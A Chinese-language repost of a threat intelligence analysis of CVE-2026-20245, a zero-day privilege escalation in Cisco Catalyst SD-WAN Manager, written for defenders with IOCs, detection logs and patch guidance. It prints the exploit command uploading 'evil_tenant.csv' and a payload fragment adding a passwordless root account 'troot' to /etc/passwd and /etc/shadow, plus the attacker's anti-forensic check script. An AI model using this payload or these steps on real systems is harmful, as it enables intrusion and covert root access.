文章总结: 本文深入分析了CVE-2026-20245这一影响CiscoSD-WAN的零日权限提升漏洞。该漏洞源于设备文件上传功能对恶意输入的过滤不足,攻击者可通过上传特制的CSV文件执行任意命令,从而将权限从普通管理员账户提升至root级别。文章详细描述了攻击者如何利用非法对等连接获得初始访问权限,利用该漏洞进行权限提升,并在得手后通过删除恶意文件、还原配置等方式进行反取证清理。最后,文章提供了包括及时升级到修复版本在内的安全加固措施和入侵指标(IOC)以帮助组织进行威胁狩猎。 综合评分: 90 文章分类: 漏洞分析,渗透测试,红队,网络安全,应急响应
【CVE-2026-20245】Cisco SD-WAN 零日利用分析
原创
骨哥说事 骨哥说事
骨哥说事
2026年6月26日 08:46 上海
在小说阅读器读本章
去阅读
| | | — | | 声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
#
#
防走失:https://gugesay.com/
不想错过任何消息?设置星标↓ ↓ ↓
#
引言
2026年初,Mandiant 发现一个威胁行为体在针对一家服务提供商的 SD-WAN 基础设施。在获得初始访问权限后,该威胁行为体利用了 Cisco Catalyst SD-WAN 中的一个零日漏洞(CVE-2026-20245),将其权限从一个已入侵的管理账户提升至 root 级别。
该漏洞源于设备的文件上传功能未能正确过滤恶意输入。
在整个入侵过程中,为了保持操作安全性并避免检测,该威胁行为体始终采用反取证技术,有选择地删除和还原了在其活动期间被修改的系统配置文件。
关键观察
- 非法对等连接与凭证操纵:2026年3月,某个威胁行为体通过未授权的对等连接建立初始访问权限,以方便进行安全外壳协议(SSH)访问。该威胁行为体利用此访问权限操纵默认账户密码以规避检测
- 利用 CVE-2026-20245:随后,攻击者利用了 Cisco Catalyst SD-WAN Manager 中的一个零日权限提升漏洞(现被追踪为 CVE-2026-20245),通过上传恶意的 CSV 文件获得 root 级别访问权限
- 全面的反取证清理:该威胁行为体删除了恶意文件、还原了配置更改,并执行了一个验证脚本以确保相关痕迹被清除
什么是 SD-WAN?
传统的广域网(WAN)严重依赖物理的专有硬件路由器来引导流量。这种模式通常缺乏灵活性、扩展复杂,且难以满足现代云计算的需求。
软件定义广域网(SD-WAN)通过将网络的管理和控制逻辑从底层物理硬件中解耦来解决此问题。它使用一个集中的软件控制器通过一个统一的仪表盘来编排整个网络,而不是逐个配置单个路由器。SD-WAN 通常被高度分散的组织(如银行、零售公司、技术服务商和医疗保健提供商)使用,以安全地将多个远程分支机构直接连接到中央云服务。
什么是对等连接 (Peering)?
在 SD-WAN 架构中,对等连接是建立不同网络组件(如边缘路由器、区域枢纽和中央控制器)之间可信的、经过身份验证的逻辑关系的过程。
在数据传输发生之前,这些设备必须执行数字握手。在对等连接阶段,设备使用加密证书进行相互身份验证。一旦身份和信任得到验证,它们就会交换底层的路由表并自动构建安全隧道以促进数据安全传输。
Cisco Catalyst SD-WAN 控制器中的其他漏洞
CVE-2026-20127 和 CVE-2026-20182 是 Cisco 最近披露的影响 Cisco Catalyst SD-WAN 控制器对等连接身份验证机制的关键漏洞。这两个漏洞都可能允许未经身份验证的远程攻击者绕过身份验证并获得管理权限。
入侵行动概述
初始访问:通过非法对等连接
从2025年底到2026年1月,Mandiant 观察到受害者的 SD-WAN Manager 设备上存在多个未授权的对等连接。这些连接的发生可能源于对 CVE-2026-20127 或 CVE-2026-20182 的利用,因为在当时这些漏洞尚未披露,也没有可用的补丁。
自2026年3月起,在一台运行不受 CVE-2026-20127 影响的软件版本的设备上发现了更多未授权的对等连接。然而,Cisco 确认这些连接也未利用 CVE-2026-20182,而是可能使用了此前对同一设备的入侵中窃取的证书材料。
目前尚不清楚2025年底至2026年1月和2026年3月的非法对等连接活动是否由同一个威胁行为体负责。
成功认证:通过修改Admin账户密码
2026年3月,该威胁行为体在受害者的相同设备上建立了新的非法对等连接,并使用 vmanage-admin 账户通过 SSH 成功认证登录到 SD-WAN Manager 设备。
在通过 SSH 认证后,威胁行为体执行了更改默认 admin 账户密码的命令。随后,该威胁行为体直接使用 admin 账户认证到 SD-WAN Manager Web 应用程序界面,并外泄了 SD-WAN 架构的配置信息。
[2026-03-07T01:31:48.464Z]"POST /j_security_check HTTP/1.1" 200 - 31 0 1288 - "" "Mozilla/5.0" "" ":8443" "127.0.0.1:8080"[2026-03-07T01:31:49.017Z] "GET /dataservice/system/device/vedges HTTP/1.1" 200 - 0 10114 127 - "" "Mozilla/5.0" "" ":8443" "127.0.0.1:8080"[2026-03-07T01:31:50.017Z] "GET /dataservice/system/device/controllers HTTP/1.1" 200 - 0 15815 100 - "" "Mozilla/5.0" "" ":8443" "127.0.0.1:8080"[2026-03-07T01:31:51.925Z] "GET /dataservice/template/config/attached/HTTP/1.1" 200 - 0 3732 18 - "" "Mozilla/5.0" "" ":8443" "127.0.0.1:8080"[2026-03-07T01:31:52.493Z] "GET /dataservice/template/config/running/HTTP/1.1" 400 - 0 134 19 - "" "Mozilla/5.0" "" ":8443" "127.0.0.1:8080"<...>
图1:威胁行为体认证与配置提取
随后,该威胁行为体利用其活动的 vmanage-admin 会话将 admin 账户的密码改回原始状态,然后终止了其活动会话。此行为很可能是为了降低在日常操作期间有管理员尝试登录设备时被发现的概率。
vmanage-admin 和 admin 账户是 Cisco Catalyst SD-WAN 控制器上的默认账户,拥有不同的权限,但 两者都不具备 root shell 访问权限。
利用 CVE-2026-20245 进行权限提升
在使用 admin 账户建立 SSH 会话后,威胁行为体通过执行以下命令来上传一个名为 evil_tenant.csv 的文件,从而利用了 CVE-2026-20245:
request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0
图2:恶意文件上传
CVE-2026-20245,一个由 Mandiant 报告给 Cisco 的漏洞,存在于 Cisco Catalyst SD-WAN 控制器的命令行界面(CLI)中,可能允许经过身份验证的本地攻击者通过向受影响系统提供特制文件来以 root 权限执行任意命令。
evil_tenant.csv 文件中包含了利用载荷。下面的代码块(图3)展示了利用载荷的一个片段,该片段试图将恶意条目追加到系统的 /etc/passwd 和 /etc/shadow 文件中。
if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ] && grep -q '' /usr/share/viptela/vbond_vsmart_tenant_list 2>/dev/null; then echo absent > /home/admin/.orig_vbond_vsmart_tenant_list.state;elif [ -e /usr/share/viptela/vbond_vsmart_tenant_list ]; then echo present > /home/admin/.orig_vbond_vsmart_tenant_list.state; cp -a /usr/share/viptela/vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list;else echo absent > /home/admin/.orig_vbond_vsmart_tenant_list.state;fi;cp -a /etc/passwd /home/admin/.orig_passwd;cp -a /etc/shadow /home/admin/.orig_shadow;grep -q '^troot:' /etc/passwd || echo 'troot:x:0:0:root:/root:/bin/bash' >> /etc/passwd;grep -q '^troot:' /etc/shadow || echo 'troot::19000:0:99999:7:::' >> /etc/shadow
图3:追加恶意条目
通过此命令,威胁行为体实现了以下目标:
- 备份了原始的
vbond_vsmart_tenant_list配置文件。该文件在利用过程中将被evil_tenant.csv的内容覆盖。此备份可能是为了允许攻击者稍后恢复文件,确保 SD-WAN Manager 设备不会加载可能引起管理员警觉的无效配置。 - 创建了原始
/etc/passwd和/etc/shadow文件的备份。 - 创建了一个名为
troot、拥有完整 root 权限的用户账户。
随后,Mandiant 观察到该威胁行为体通过 su(切换用户)命令从 admin 账户访问了这个新的 troot 账户。
反取证技术
Mandiant 发现该威胁行为体删除了他们创建的所有文件,包括 evil_tenant.csv,并还原了他们修改的任何系统配置。这些删除和修改操作是为了最小化其在取证中留下的痕迹。
此外,Mandiant 还观察到一个验证脚本的执行,该脚本用于检查是否清除了威胁行为体活动的痕迹。
for f in /home/admin/evil_tenant.csv /home/admin/.orig_vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list.state /home/admin/.orig_passwd /home/admin/.orig_shadow; do if [ -e "$f" ]; then echo PRESENT:$f; ls -ld "$f"; else echo ABSENT:$f; fi; done; if grep -q '^troot:' /etc/passwd;then echo PRESENT:/etc/passwd:troot;else echo ABSENT:/etc/passwd:troot;fi;
if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ];then echo PRESENT:/usr/share/viptela/vbond_vsmart_tenant_list; ls -ld /usr/share/viptela/vbond_vsmart_tenant_list;else echo ABSENT:/usr/share/viptela/vbond_vsmart_tenant_list;fi
图4:验证脚本
此脚本检查以下项目是否存在:
/home/admin目录下的威胁行为体创建的文件。/etc/passwd和/etc/shadow文件中的troot账户。vbond_vsmart_tenant_list文件,如果存在,则检查该文件的信息。这很可能是为了检查原始文件是否已还原。
态势展望与影响
本次攻击行动突显了“存活于边缘”(living off the edge) 的范式,即威胁行为体优先入侵网络设备,以绕过传统的安全边界。随着组织越来越多地采用软件定义网络,管理这些环境的编排器成为首要目标。这些设备为威胁行为体提供了“黑盒”环境:它们通常缺乏深度取证分析所需的遥测数据,而其作为中央控制器的角色则为持久、大规模地访问企业内部流量提供了一个隐蔽的平台。对于国家支持的行动者而言,利用这些平台中的零日漏洞仍然是进行长期战略性情报收集的一个主要途径。Google Threat Intelligence Group (GTIG) 在 过去几年持续、密切关注 并 报告了 边缘设备零日利用的增加。
修复与加固措施
- 执行 IOC 扫描/威胁狩猎:通过在所有的控制平面组件上执行
request admin-tech命令,收集 SD-WAN 设备的日志和诊断数据。扫描这些收集的数据以查找已知的入侵指标(IOC),并根据本文“检测与狩猎”章节确定的战术、技术和程序(TTPs)执行威胁狩猎。如果观察到真实阳性结果,请进行全面调查。 - 获取手动修复支持:根据 Cisco 的指导,任何已确认的入侵指标或可疑活动都应发送给 Cisco 技术支持中心(TAC),以便进行全面审查和修复协助。
- 优先进行即时修补和升级:组织必须优先将 Cisco Catalyst SD-WAN Manager 升级到已修复的软件版本,特别是版本 20.9.9.2、20.12.7.2、20.15.4.5、20.15.5.3、20.18.3.1、26.1.1.2 或更高版本,以修复 CVE-2026-20245。
- 实施 Cisco Catalyst SD-WAN 加固与日志记录指南:组织应遵循 Cisco Catalyst SD-WAN 加固指南 中详细阐述的全面安全最佳实践和配置标准。该指南为保护所有 SD-WAN 组件(包括管理平面、控制平面和数据平面)免受未授权访问提供了强大的纵深防御框架。
入侵指标(IOC)
为协助更广泛的社区进行本文所述的威胁狩猎和识别活动,我们在免费的 GTI Collection 中为注册用户提供了入侵指标(IOCs)。
网络指标
| 描述 | 指标 |
| — | — |
| 作为非法设备连接并利用 CVE-2026-20245 的 IP 地址 | 126.51.108[.]152 |
| 作为非法设备连接的 IP 地址 | 76.92.245[.]217 |
| 作为非法设备连接的 IP 地址 | 207.190.37[.]94 |
| 作为非法设备连接的 IP 地址 | 23.245.7[.]178 |
| 作为非法设备连接的 IP 地址 | 153.186.231[.]233 |
| 作为非法设备连接的 IP 地址 | 167.179.79[.]189 |
| 作为非法设备连接的 IP 地址 | 45.32.38[.]160 |
| 作为非法设备连接的 IP 地址 | 209.137.225[.]101 |
文件指标
由于威胁行为体进行了全面的反取证清理,与此入侵相关的几个文件被覆盖或删除。不过,恶意 CSV 载荷的取证残留被恢复。
| 文件名 | 描述 | SHA256 |
| — | — | — |
| /home/admin/.orig_vbond_vsmart_tenant_list | 备份配置文件 | 未恢复 |
| /home/admin/.orig_vbond_vsmart_tenant_list.state | 状态文件 | 未恢复 |
| /home/admin/.orig_passwd | 备份密码文件 | 未恢复 |
| /home/admin/.orig_shadow | 备份密码文件 | 未恢复 |
| /home/admin/evil_tenant.csv | 利用 CVE-2026-20245 的恶意 CSV 文件残留 | b82936f37648518425c7d3cf9e09eaffa41d7cdb3840f6a40287e3a108880f7b |
检测与狩猎
Mandiant 鼓励组织围绕本报告中概述的战术、技术和程序(TTPs)开展积极的威胁狩猎,以识别可能混入常规操作的其他活动。由于某些入侵指标可能与合法的管理操作相似,因此根据已建立的网络态势评估这些观察结果以最小化误报至关重要。
根据 Cisco 的指导,任何可疑活动或已确认的入侵指标都应发送给 Cisco TAC 进行全面审查和协助。
使用 vmanage-admin 身份的非法 SSH 连接
监控身份验证日志(/var/log/auth.log),查找来自意外的外部 IP 地址、使用 vmanage-admin 用户账户的登录记录。
Jan 01 07:58:00 vManage sshd[20766]: Accepted publickey for vmanage-admin fromport 48373 ssh2: RSA SHA256:Jan 01 08:01:00 vManage sshd[25178]: Accepted keyboard-interactive/pam for admin fromport 60552 ssh2
图5:来自意外来源的 SSH
可疑的密码更改事件
审计 /var/log/auth.log 中针对 admin 账户在短时间内发生的密码更改,尤其是涉及密码被设置后又恢复原状的情况。
Jan 01 08:00:00 vManage usermod[12345]: change user 'admin' password
Jan 01 08:15:00 vManage usermod[12345]: change user 'admin' password
</code>
图6:密码更改
防御者还应检查 /var/confd/rollback/ 目录中针对用户密码的配置差异回滚文件:
# Created by: vmanage-admin# Date: 2026-01-01 08:00:00# Via: netconf# Type: delta# Label: # Comment: # No: 10000# TransactionId: 12345678# Hostname: vManagesystem {aaa {user admin {password;}}}
图7:回滚文件
可疑的 su 命令执行
审计终端命令历史记录和系统日志(/var/log/auth.log),查找从 admin 账户切换到未授权账户(例如 troot)的成功切换用户(su)执行记录。
Jan 01 08:03:00 vManage su[24289]: Successful su for troot by admin
</code>
图8:su 登录
CVE-2026-20245 的利用
监控脚本日志(/var/log/scripts.log),查找涉及未授权执行 vconfd_script_upload_tenant_list.sh 的执行异常。
Jan 01 08:01:05 vManage vScript: Tenant list upload per vsmart serial number: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/evil_tenant.csv vpn 0
Jan 01 08:01:05 vManage vScript: uploading tenant list via VPN 0 true
Jan 01 08:01:05 vManage vScript: Copying ... /home/admin/evil_tenant.csv via VPN 0
Jan 01 08:01:05 vManage vScript: Successfully loaded the tenant placement file
</code>
图9:执行异常
防御者还可以使用 Viptela CLI 中的 show history 命令查询特定的管理上传命令的活跃命令执行历史:
01-01 08:01:05 -- request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0
</code>
图10:命令执行
- END –
感谢阅读,如果觉得还不错的话,动动手指给个三连吧~
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:骨哥说事 骨哥说事 骨哥说事《【CVE-2026-20245】Cisco SD-WAN 零日利用分析》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论